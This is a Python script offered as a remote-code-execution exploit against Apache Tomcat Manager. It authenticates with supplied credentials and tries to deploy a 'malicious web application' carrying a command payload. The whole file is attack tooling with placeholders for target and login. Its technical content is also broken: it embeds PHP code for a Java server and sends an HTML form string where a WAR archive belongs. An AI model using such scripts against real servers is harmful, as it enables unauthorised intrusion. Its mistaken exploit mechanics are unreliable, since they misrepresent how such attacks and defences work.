import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)